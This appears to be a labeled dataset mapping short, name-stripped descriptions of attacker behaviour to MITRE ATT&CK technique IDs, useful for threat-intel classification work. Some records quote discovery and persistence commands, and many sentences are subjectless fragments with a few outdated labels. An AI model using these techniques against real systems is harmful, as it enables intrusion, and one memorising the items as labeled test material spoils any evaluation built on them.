{"text1":"has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).","labels":"['T1546.015']"}
|
|
{"text1":"has used compromised credentials to access other systems on a victim network.","labels":"['T1078']"}
|
|
{"text1":"has used compromised WordPress blogs as C2 servers.","labels":"['T1102']"}
|
|
{"text1":"has used credential dumping tools.","labels":"['T1003']"}
|
|
{"text1":"has used credential dumping tools such as and Lazagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.","labels":"['T1003']"}
|
|
{"text1":"has used custom DNS Tunneling protocols for C2.","labels":"['T1095']"}
|
|
{"text1":"has used CVE-2014-6324 to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"has used CVE-2015-4902 to bypass security features.","labels":"['T1211']"}
|
|
{"text1":"has used Daniel Bohannon\u2019s Invoke-Obfuscation framework. The group also used files with base64 encoded PowerShell commands.","labels":"['T1027']"}
|
|
{"text1":"has used DLL search order hijacking.","labels":"['T1574.001']"}
|
|
{"text1":"has used DLL side-loading.","labels":"['T1574.002']"}
|
|
{"text1":"has used DLL side-loading to load malicious payloads.","labels":"['T1574.002']"}
|
|
{"text1":"has used encoded PowerShell scripts uploaded to installations to download and install , as well as to evade defenses.","labels":"['T1064']"}
|
|
{"text1":"has used encoded PowerShell scripts uploaded to installations to download and install . also used PowerShell scripts to evade defenses.","labels":"['T1059.001']"}
|
|
{"text1":"has used exploits to increase their levels of rights and privileges.","labels":"['T1068']"}
|
|
{"text1":"has used filenames and Registry key names associated with Windows Defender.","labels":"['T1036']"}
|
|
{"text1":"has used Flash Player (CVE-2016-4117, CVE-2018-4878) and Word (CVE-2017-0199) exploits for execution.","labels":"['T1203']"}
|
|
{"text1":"has used for credential dumping, as well as Metasploit\u2019s NTDSGRAB module to obtain a copy of the victim's Active Directory database.","labels":"['T1003']"}
|
|
{"text1":"has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.","labels":"['T1027']"}
|
|
{"text1":"has used HTTP, HTTPS, and DNS for command and control.","labels":"['T1071']"}
|
|
{"text1":"has used HTTP for C2, including sending error codes in Cookie headers.","labels":"['T1071']"}
|
|
{"text1":"has used HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"has used HTTP requests for command and control.","labels":"['T1071']"}
|
|
{"text1":"has used in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has used certutil -decode to decode files on the victim\u2019s machine when dropping .","labels":"['T1140']"}
|
|
{"text1":"has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.","labels":"['T1071']"}
|
|
{"text1":"has used keyloggers that are also capable of dumping credentials.","labels":"['T1003']"}
|
|
{"text1":"has used keylogging tools.","labels":"['T1056']"}
|
|
{"text1":"has used legitimate access granted to Managed Service Providers in order to access victims of interest.","labels":"['T1199']"}
|
|
{"text1":"has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.","labels":"['T1078', 'T1133']"}
|
|
{"text1":"has used macros in s as well as executed VBScripts on victim machines.","labels":"['T1064']"}
|
|
{"text1":"has used macros in Word documents that would download a second stage if executed.","labels":"['T1064']"}
|
|
{"text1":"has used malicious macros embedded inside Office documents to execute files.","labels":"['T1064']"}
|
|
{"text1":"has used Metasploit to perform reflective DLL injection in order to escalate privileges.","labels":"['T1055']"}
|
|
{"text1":"has used Meterpreter to enumerate users on remote systems.","labels":"['T1033']"}
|
|
{"text1":"has used Mshta.exe to execute its payload.","labels":"['T1218.005']"}
|
|
{"text1":"has used mshta.exe to execute VBScript to execute malicious code on victim systems.","labels":"['T1218.005']"}
|
|
{"text1":"has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of.","labels":"['T1203']"}
|
|
{"text1":"has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript.","labels":"['T1064']"}
|
|
{"text1":"has used net.exe in a script with net accounts \/domain to find the password policy of a domain.","labels":"['T1201']"}
|
|
{"text1":"has used net group \/domain, net localgroup administrators, net group \u201cdomain admins\u201d \/domain, and net group \u201cExchange Trusted Subsystem\u201d \/domain to find group permission settings on a victim.","labels":"['T1069']"}
|
|
{"text1":"has used netstat -an on a victim to get a listing of network connections.","labels":"['T1049']"}
|
|
{"text1":"has used net time to check the local time on a target system.","labels":"['T1124']"}
|
|
{"text1":"has used net use to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim.","labels":"['T1049']"}
|
|
{"text1":"has used network scanning and enumeration tools, including .","labels":"['T1018']"}
|
|
{"text1":"has used ping to identify other machines of interest.","labels":"['T1018']"}
|
|
{"text1":"has used port 8080 for C2.","labels":"['T1043']"}
|
|
{"text1":"has used port 80 for C2.","labels":"['T1043']"}
|
|
{"text1":"has used ports 53, 80, 443, and 8080 for C2.","labels":"['T1043']"}
|
|
{"text1":"has used ports 8060 and 8888 for C2.","labels":"['T1571']"}
|
|
{"text1":"has used powershell.exe to download and execute scripts.","labels":"['T1059.001']"}
|
|
{"text1":"has used PowerShell-based tools and shellcode loaders for execution.","labels":"['T1059.001']"}
|
|
{"text1":"has used PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"has used PowerShell for execution and privilege escalation.","labels":"['T1059.001']"}
|
|
{"text1":"has used PowerShell for execution of a payload.","labels":"['T1059.001']"}
|
|
{"text1":"has used PowerShell on victim systems to download and run payloads after exploitation.","labels":"['T1064', 'T1059.001']"}
|
|
{"text1":"has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.","labels":"['T1059.001']"}
|
|
{"text1":"has used PowerShell scripts to download and execute programs in memory, without writing to disk.","labels":"['T1064', 'T1059.001']"}
|
|
{"text1":"has used process hollowing in iexplore.exe to load the implant.","labels":"['T1055.012']"}
|
|
{"text1":"has used Putty Secure Copy Client (PSCP) to transfer data.","labels":"['T1021']"}
|
|
{"text1":"has used Putty to access compromised systems.","labels":"['T1021']"}
|
|
{"text1":"has used RAR to compress collected data before.","labels":"['T1560']"}
|
|
{"text1":"has used RAR to stage and compress local folders.","labels":"['T1560']"}
|
|
{"text1":"has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic.","labels":"['T1573']"}
|
|
{"text1":"has used RC4 to encrypt C2 traffic.","labels":"['T1573']"}
|
|
{"text1":"has used RDP connections to move across the victim network.","labels":"['T1021.001']"}
|
|
{"text1":"has used RDP for.","labels":"['T1021.001']"}
|
|
{"text1":"has used RDP to move laterally to systems in the victim environment.","labels":"['T1021.001']"}
|
|
{"text1":"has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.","labels":"['T1547.001']"}
|
|
{"text1":"has used reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d on a victim to query the Registry.","labels":"['T1012']"}
|
|
{"text1":"has used regsvr32.exe to execute a server variant of in victim networks.","labels":"['T1218.010']"}
|
|
{"text1":"has used regsvr32 for execution.","labels":"['T1218.010']"}
|
|
{"text1":"has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.","labels":"['T1021.001']"}
|
|
{"text1":"has used Remote Desktop Protocol to conduct lateral movement.","labels":"['T1021.001']"}
|
|
{"text1":"has used scheduled tasks to persist on victim systems.","labels":"['T1053.005']"}
|
|
{"text1":"has used sc query on a victim to gather information about services.","labels":"['T1007']"}
|
|
{"text1":"has used several different keyloggers.","labels":"['T1056']"}
|
|
{"text1":"has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.","labels":"['T1016']"}
|
|
{"text1":"has used shell and VBS scripts as well as embedded macros for execution.","labels":"['T1064']"}
|
|
{"text1":"has used shellcode to download Meterpreter after compromising a victim.","labels":"['T1105']"}
|
|
{"text1":"has used spearphishing via a link to get users to download and run their malware.","labels":"['T1204']"}
|
|
{"text1":"has used spearphishing with an attachment to deliver files with exploits to initial victims.","labels":"['T1598.002']"}
|
|
{"text1":"has used stolen certificates to sign its malware.","labels":"['T1553.002']"}
|
|
{"text1":"has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. The group has also moved laterally using the Local Administrator account.","labels":"['T1078']"}
|
|
{"text1":"has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.","labels":"['T1189']"}
|
|
{"text1":"has used TeamViewer to preserve remote access in case control using the Cobalt Strike module was lost.","labels":"['T1108']"}
|
|
{"text1":"has used Technet and Pastebin web pages for command and control.","labels":"['T1102']"}
|
|
{"text1":"has used the command-line interface.","labels":"['T1059']"}
|
|
{"text1":"has used the command-line interface for execution.","labels":"['T1059']"}
|
|
{"text1":"has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.","labels":"['T1090.004']"}
|
|
{"text1":"has used the Microsoft administration tool csvde.exe to export Active Directory data.","labels":"['T1087']"}
|
|
{"text1":"has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\\Software\\Microsoft\\Office test\\Special\\Perf to execute code.","labels":"['T1137']"}
|
|
{"text1":"has used the open source tool Essential NetTools to map the network and build a list of targets.","labels":"['T1018']"}
|
|
{"text1":"has used the Plink utility to create SSH tunnels.","labels":"['T1573']"}
|
|
{"text1":"has used the Plink utility to tunnel RDP back to C2 infrastructure.","labels":"['T1573']"}
|
|
{"text1":"has used the RAT, which communicates over HTTP with a payload encrypted with RC4.","labels":"['T1573']"}
|
|
{"text1":"has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.","labels":"['T1546.008']"}
|
|
{"text1":"has used the Windows command shell to execute commands.","labels":"['T1059']"}
|
|
{"text1":"has used to locate PDF, Excel, and Word documents during. The group also searched a compromised DCCC computer for specific terms.","labels":"['T1083']"}
|
|
{"text1":"has used tools to compress data before exfilling it.","labels":"['T1560']"}
|
|
{"text1":"has used tools to take screenshots from victims.","labels":"['T1113']"}
|
|
{"text1":"has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.","labels":"['T1120']"}
|
|
{"text1":"has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.","labels":"['T1078']"}
|
|
{"text1":"has used valid accounts shared between Managed Service Providers and clients to move between the two environments.","labels":"['T1078']"}
|
|
{"text1":"has used valid digital certificates from Sysprint AG to sign its dropper.","labels":"['T1553.002']"}
|
|
{"text1":"has used various batch scripts to establish C2, download additional files, and conduct other functions.","labels":"['T1064']"}
|
|
{"text1":"has used various forms of spearphishing attempting to get a user to open links or attachments.","labels":"['T1204']"}
|
|
{"text1":"has used various forms of spearphishing in attempts to get users to open links or attachments.","labels":"['T1204']"}
|
|
{"text1":"has used various methods of process injection including hot patching.","labels":"['T1055']"}
|
|
{"text1":"has used various tools to download files, including DGet (a similar tool to wget).","labels":"['T1105']"}
|
|
{"text1":"has used various tools to perform credential dumping.","labels":"['T1003']"}
|
|
{"text1":"has used various types of scripting for execution, including .bat and .vbs scripts. The group has also used macros to deliver malware such as and .","labels":"['T1064']"}
|
|
{"text1":"has used VBS, VBE, and batch scripts for execution.","labels":"['T1064']"}
|
|
{"text1":"has used VBScript and JavaScript files to execute its payload.","labels":"['T1064']"}
|
|
{"text1":"has used via Web shell to establish redundant access. The group has also used harvested credentials to gain access to Internet-accessible resources such as Outlook Web Access, which could be used for redundant access.","labels":"['T1108']"}
|
|
{"text1":"has used Web shells, often to maintain access to a victim network.","labels":"['T1505.003']"}
|
|
{"text1":"has used Web shells to maintain access to victim websites.","labels":"['T1505.003']"}
|
|
{"text1":"has used Windows DDE for execution of commands and a malicious VBS.","labels":"['T1559.002']"}
|
|
{"text1":"has used WinSCP to exfiltrate data from a targeted organization over FTP.","labels":"['T1048']"}
|
|
{"text1":"has used WMI event filters to establish persistence.","labels":"['T1546.003']"}
|
|
{"text1":"has used WMI for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"has used XOR with 0x90 to obfuscate its configuration file.","labels":"['T1027']"}
|
|
{"text1":"has utilized during and.","labels":"['T1078']"}
|
|
{"text1":"hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.","labels":"['T1102']"}
|
|
{"text1":"hides collected data in password-protected .rar archives.","labels":"['T1560', 'T1486']"}
|
|
{"text1":"hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.","labels":"['T1014']"}
|
|
{"text1":"hides many of its backdoor payloads in an alternate data stream (ADS).","labels":"['T1564.004']"}
|
|
{"text1":"hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.","labels":"['T1055.012']"}
|
|
{"text1":"identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.","labels":"['T1135']"}
|
|
{"text1":"identifies and kills anti-malware processes.","labels":"['T1562.001']"}
|
|
{"text1":"identifies a proxy server if it exists and uses it to make HTTP requests.","labels":"['T1090']"}
|
|
{"text1":"identifies files and directories for collection by searching for specific file extensions or file modification time.","labels":"['T1083']"}
|
|
{"text1":"identifies files matching certain file extension and copies them to subdirectories it created.","labels":"['T1083']"}
|
|
{"text1":"identifies files with certain extensions and copies them to a directory in the user's profile.","labels":"['T1074']"}
|
|
{"text1":"identifies processes and collects the process ids.","labels":"['T1057']"}
|
|
{"text1":"identifies security software such as antivirus through the Security module.","labels":"['T1518.001']"}
|
|
{"text1":"identifies the victim username.","labels":"['T1033']"}
|
|
{"text1":"If an initial connectivity check fails, attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.","labels":"['T1552.001']"}
|
|
{"text1":"If cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.","labels":"['T1078']"}
|
|
{"text1":"If does not detect a proxy configured on the infected machine, it will send beacons via UDP\/6000. Also, after retrieving a C2 IP address and Port Number, will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.","labels":"['T1095']"}
|
|
{"text1":"If installing itself as a service fails, instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.","labels":"['T1036']"}
|
|
{"text1":"If running as administrator, installs itself as a new service named bmwappushservice to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"implements a command and control protocol over HTTP.","labels":"['T1071']"}
|
|
{"text1":"includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods.","labels":"['T1027.005']"}
|
|
{"text1":"includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.","labels":"['T1113']"}
|
|
{"text1":"includes garbage code to mislead anti-malware software and researchers.","labels":"['T1027.001']"}
|
|
{"text1":"infected victims using JavaScript code.","labels":"['T1064']"}
|
|
{"text1":"injects a DLL for into the explorer.exe process.","labels":"['T1055']"}
|
|
{"text1":"injects DLL files into iexplore.exe.","labels":"['T1055']"}
|
|
{"text1":"injects into other processes to load modules.","labels":"['T1055']"}
|
|
{"text1":"injects into the Internet Explorer process.","labels":"['T1055']"}
|
|
{"text1":"injects into the svchost.exe process.","labels":"['T1055']"}
|
|
{"text1":"injects its DLL component into svchost.exe.","labels":"['T1055']"}
|
|
{"text1":"injects its DLL file into a newly spawned Internet Explorer process.","labels":"['T1055']"}
|
|
{"text1":"injects itself into various processes depending on whether it is low integrity or high integrity.","labels":"['T1055']"}
|
|
{"text1":"injects its malware variant, , into the cmd.exe process.","labels":"['T1055']"}
|
|
{"text1":"inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.","labels":"['T1001']"}
|
|
{"text1":"installation file is an unsigned DMG image under the guise of Intego\u2019s security solution for mac.","labels":"['T1036']"}
|
|
{"text1":"installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as \u201cNet Monitor.\"","labels":"['T1036']"}
|
|
{"text1":"installer searches the Registry and system to see if specific antivirus tools are installed on the system.","labels":"['T1518.001']"}
|
|
{"text1":"installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry.","labels":"['T1543.003']"}
|
|
{"text1":"installs a registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"installs a root certificate to aid in man-in-the-middle actions.","labels":"['T1553.004']"}
|
|
{"text1":"installs a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
|
|
{"text1":"installs itself as a new service.","labels":"['T1543.003']"}
|
|
{"text1":"installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.","labels":"['T1543.003']"}
|
|
{"text1":"installs itself under Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.","labels":"['T1558.003']"}
|
|
{"text1":"Invoke-TokenManipulation Exfiltration module can be used to locate and impersonate user logon tokens.","labels":"['T1134']"}
|
|
{"text1":"Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a payload.","labels":"['T1047']"}
|
|
{"text1":"is a kernel-mode rootkit.","labels":"['T1014']"}
|
|
{"text1":"is a PowerShell backdoor.","labels":"['T1059.001']"}
|
|
{"text1":"is a RAT that communicates with HTTP.","labels":"['T1043']"}
|
|
{"text1":"is a rootkit that hides certain operating system artifacts.","labels":"['T1014']"}
|
|
{"text1":"is a rootkit used by .","labels":"['T1014']"}
|
|
{"text1":"is a simple proxy that creates an outbound RDP connection.","labels":"['T1090']"}
|
|
{"text1":"is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.","labels":"['T1014', 'T1542.001']"}
|
|
{"text1":"is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.","labels":"['T1542.003']"}
|
|
{"text1":"is a Web shell. The ASPXTool version used by has been deployed to accessible servers running Internet Information Services (IIS).","labels":"['T1505.003']"}
|
|
{"text1":"is capable of accessing locally stored passwords on victims.","labels":"['T1552.001']"}
|
|
{"text1":"is capable of configuring itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"is capable of creating a remote Bash shell and executing commands.","labels":"['T1059']"}
|
|
{"text1":"is capable of creating a reverse shell.","labels":"['T1059']"}
|
|
{"text1":"is capable of creating reverse shell.","labels":"['T1059']"}
|
|
{"text1":"is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.","labels":"['T1070.004']"}
|
|
{"text1":"is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.","labels":"['T1070.004']"}
|
|
{"text1":"is capable of deleting Registry keys, sub-keys, and values on a victim system.","labels":"['T1112']"}
|
|
{"text1":"is capable of deleting Registry keys used for persistence.","labels":"['T1070']"}
|
|
{"text1":"is capable of downloading additional files.","labels":"['T1105']"}
|
|
{"text1":"is capable of downloading additional files through C2 channels, including a new version of itself.","labels":"['T1105']"}
|
|
{"text1":"is capable of downloading files, including additional modules.","labels":"['T1105']"}
|
|
{"text1":"is capable of downloading files from the C2.","labels":"['T1105']"}
|
|
{"text1":"is capable of downloading remote files.","labels":"['T1105']"}
|
|
{"text1":"is capable of enumerating and making modifications to an infected system's Registry.","labels":"['T1012']"}
|
|
{"text1":"is capable of enumerating and manipulating files and directories.","labels":"['T1083']"}
|
|
{"text1":"is capable of enumerating application windows.","labels":"['T1010']"}
|
|
{"text1":"is capable of executing commands.","labels":"['T1059']"}
|
|
{"text1":"is capable of executing commands and spawning a reverse shell.","labels":"['T1059']"}
|
|
{"text1":"is capable of executing commands via cmd.exe.","labels":"['T1059']"}
|
|
{"text1":"is capable of file deletion along with other file system interaction.","labels":"['T1070.004']"}
|
|
{"text1":"is capable of injecting code into the APC queue of a created process as part of an \"Early Bird injection.\"","labels":"['T1055']"}
|
|
{"text1":"is capable of keylogging.","labels":"['T1056']"}
|
|
{"text1":"is capable of listing contents of folders on the victim. also searches for custom network encryption software on victims.","labels":"['T1083']"}
|
|
{"text1":"is capable of listing files, folders, and drives on a victim.","labels":"['T1083']"}
|
|
{"text1":"is capable of loading executable code via process hollowing.","labels":"['T1055.012']"}
|
|
{"text1":"is capable of logging keystrokes.","labels":"['T1056']"}
|
|
{"text1":"is capable of obtaining directory, file, and drive listings.","labels":"['T1083']"}
|
|
{"text1":"is capable of opening a command terminal.","labels":"['T1059']"}
|
|
{"text1":"is capable of performing directory listings.","labels":"['T1083']"}
|
|
{"text1":"is capable of performing keylogging.","labels":"['T1056']"}
|
|
{"text1":"is capable of performing process listings.","labels":"['T1057']"}
|
|
{"text1":"is capable of performing remote command execution.","labels":"['T1059']"}
|
|
{"text1":"is capable of performing remote file transmission.","labels":"['T1105']"}
|
|
{"text1":"is capable of performing screen captures.","labels":"['T1113']"}
|
|
{"text1":"is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.","labels":"['T1547.001']"}
|
|
{"text1":"is capable of probing the network for open ports.","labels":"['T1046']"}
|
|
{"text1":"is capable of providing shell functionality to the attacker to execute commands.","labels":"['T1059']"}
|
|
{"text1":"is capable of reading files over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"is capable of recording keystrokes.","labels":"['T1056']"}
|
|
{"text1":"is capable of retrieving information about the infected system.","labels":"['T1082']"}
|
|
{"text1":"is capable of spawning a Windows command shell.","labels":"['T1059']"}
|
|
{"text1":"is capable of spreading to USB devices.","labels":"['T1091']"}
|
|
{"text1":"is capable of starting a process using CreateProcess.","labels":"['T1106']"}
|
|
{"text1":"is capable of stealing Outlook passwords.","labels":"['T1003']"}
|
|
{"text1":"is capable of taking an image of and uploading the current desktop.","labels":"['T1113']"}
|
|
{"text1":"is capable of taking screenshots.","labels":"['T1113']"}
|
|
{"text1":"is capable of uploading and downloading files.","labels":"['T1105']"}
|
|
{"text1":"is capable of using HTTP, HTTPS, SMTP, and DNS for C2.","labels":"['T1071']"}
|
|
{"text1":"is capable of using ICMP, TCP, and UDP for C2.","labels":"['T1095']"}
|
|
{"text1":"is capable of using its command and control protocol over port 443. However, Duqu is also capable of encapsulating its command protocol over standard application layer protocols. The Duqu command and control protocol implements many of the same features as TCP and is a reliable transport protocol.","labels":"['T1095']"}
|
|
{"text1":"is capable of using Windows hook interfaces for information gathering such as credential access.","labels":"['T1056.004']"}
|
|
{"text1":"is capable of writing a file to the compromised system from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"is capable of writing to a Registry Run key to establish.","labels":"['T1547.001']"}
|
|
{"text1":"is controlled via commands that are appended to image files.","labels":"['T1001']"}
|
|
{"text1":"is digitally signed by Microsoft.","labels":"['T1553.002']"}
|
|
{"text1":"is executed using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.","labels":"['T1027']"}
|
|
{"text1":"is initially packed.","labels":"['T1027.002']"}
|
|
{"text1":"is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"","labels":"['T1218.011']"}
|
|
{"text1":"is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.","labels":"['T1111']"}
|
|
{"text1":"is known to have the capability to overwrite the firmware on hard drives from some manufacturers.","labels":"['T1542.002']"}
|
|
{"text1":"is known to use RAR with passwords to encrypt data prior to exfiltration.","labels":"['T1486']"}
|
|
{"text1":"is known to use software packing in its tools.","labels":"['T1027.002']"}
|
|
{"text1":"is known to utilize encryption within network protocols.","labels":"['T1573']"}
|
|
{"text1":"is launched through use of DLL search order hijacking to load a malicious dll.","labels":"['T1574.001']"}
|
|
{"text1":"is obfuscated using the obfuscation tool called ConfuserEx.","labels":"['T1027']"}
|
|
{"text1":"is obfuscated using the open source ConfuserEx protector. also obfuscates the name of created files\/folders\/mutexes and encrypts debug messages written to log files using the Rijndael cipher.","labels":"['T1027']"}
|
|
{"text1":"is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.","labels":"['T1027']"}
|
|
{"text1":"is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.","labels":"['T1553.002']"}
|
|
{"text1":"is used to automate SQL injection.","labels":"['T1190']"}
|
|
{"text1":"is used to enumerate and dump information from Microsoft SharePoint.","labels":"['T1213']"}
|
|
{"text1":"is used to execute programs and other actions at the command-line interface.","labels":"['T1059']"}
|
|
{"text1":"is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.","labels":"['T1098']"}
|
|
{"text1":"is used to poison name services to gather hashes and credentials from systems within a local network.","labels":"['T1557.001']"}
|
|
{"text1":"is used to schedule tasks on a Windows system to run at a specific date and time.","labels":"['T1053.005']"}
|
|
{"text1":"is usually configured with primary and backup domains for C2 communications.","labels":"['T1008']"}
|
|
{"text1":"is written in PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.","labels":"['T1134']"}
|
|
{"text1":"kills and disables services by using cmd.exe.","labels":"['T1059']"}
|
|
{"text1":"kills and disables services for Windows Firewall, Windows Security Center, and Windows Defender.","labels":"['T1562.001']"}
|
|
{"text1":"kills anti-virus found on the victim.","labels":"['T1562.001']"}
|
|
{"text1":"kills security tools like Wireshark that are running.","labels":"['T1562.001']"}
|
|
{"text1":"Lateral movement can be done with through net use commands to connect to the on remote systems.","labels":"['T1021.002']"}
|
|
{"text1":"launched a scheduled task to gain persistence using the schtasks \/create \/sc command.","labels":"['T1053.005']"}
|
|
{"text1":"launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.","labels":"['T1218.011']"}
|
|
{"text1":"launches a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"launches a script to delete their original decoy file to cover tracks.","labels":"['T1070.004']"}
|
|
{"text1":"launches a shell to execute commands on the victim\u2019s machine.","labels":"['T1059']"}
|
|
{"text1":"leveraged a compiled HTML file that contained a command to download and run an executable.","labels":"['T1218.001']"}
|
|
{"text1":"leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.","labels":"['T1046']"}
|
|
{"text1":"leveraged a watering hole to serve up malicious code.","labels":"['T1189']"}
|
|
{"text1":"leveraged PowerShell to download and execute additional scripts for execution.","labels":"['T1059.001']"}
|
|
{"text1":"leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.","labels":"['T1059.001']"}
|
|
{"text1":"leveraged several compromised universities as proxies to obscure its origin.","labels":"['T1090']"}
|
|
{"text1":"leveraged the DDE protocol to deliver their malware.","labels":"['T1559.002']"}
|
|
{"text1":"leveraged the tool LaZagne for retrieving login and password information.","labels":"['T1003']"}
|
|
{"text1":"leverages a custom packer to obfuscate its functionality.","labels":"['T1027.002']"}
|
|
{"text1":"leverages cmd.exe to perform discovery techniques.","labels":"['T1059']"}
|
|
{"text1":"leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications.","labels":"['T1102']"}
|
|
{"text1":"leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.","labels":"['T1102']"}
|
|
{"text1":"leverages valid accounts after gaining credentials for use within the victim domain.","labels":"['T1078']"}
|
|
{"text1":"leverages vulnerable versions of Flash to perform execution.","labels":"['T1203']"}
|
|
{"text1":"likely obtained a list of hosts in the victim environment.","labels":"['T1018']"}
|
|
{"text1":"listed remote shared drives that were accessible from a victim.","labels":"['T1135']"}
|
|
{"text1":"lists files in directories.","labels":"['T1083']"}
|
|
{"text1":"lists processes running on the system.","labels":"['T1057']"}
|
|
{"text1":"lists running processes.","labels":"['T1057']"}
|
|
{"text1":"lists the directories for Desktop, program files, and the user\u2019s recently accessed files.","labels":"['T1083']"}
|
|
{"text1":"lists the running processes.","labels":"['T1057']"}
|
|
{"text1":"loads malicious shellcode and executes it in memory.","labels":"['T1064']"}
|
|
{"text1":"logs key strokes for configured processes and sends them back to the C2 server.","labels":"['T1056']"}
|
|
{"text1":"logs the keystrokes on the targeted system.","labels":"['T1056']"}
|
|
{"text1":"looks for specific files and file types.","labels":"['T1083']"}
|
|
{"text1":"lower disable security settings by changing Registry keys.","labels":"['T1562.001']"}
|
|
{"text1":"lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.","labels":"['T1204']"}
|
|
{"text1":"maintains access to victim environments by using to access as well as establishing a backup RDP tunnel by using .","labels":"['T1108']"}
|
|
{"text1":"makes modifications to open-source scripts from GitHub and executes them on the victim\u2019s machine.","labels":"['T1064']"}
|
|
{"text1":"makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.","labels":"['T1204']"}
|
|
{"text1":"malicious spearphishing payloads are executed as . has also used during and.","labels":"['T1059.001']"}
|
|
{"text1":"malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. has also used WMIC during and post compromise cleanup activities.","labels":"['T1047']"}
|
|
{"text1":"malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.","labels":"['T1110']"}
|
|
{"text1":"malware attempts to determine the installed version of .NET by querying the Registry.","labels":"['T1012']"}
|
|
{"text1":"malware can create a .lnk file and add a Registry Run key to establish persistence.","labels":"['T1547.009', 'T1547.001']"}
|
|
{"text1":"malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\\Software\\Microsoft\\Office\\.","labels":"['T1112']"}
|
|
{"text1":"malware can decode contents from a payload that was Base64 encoded and write the contents to a file.","labels":"['T1140']"}
|
|
{"text1":"malware can download additional files from C2 servers.","labels":"['T1105']"}
|
|
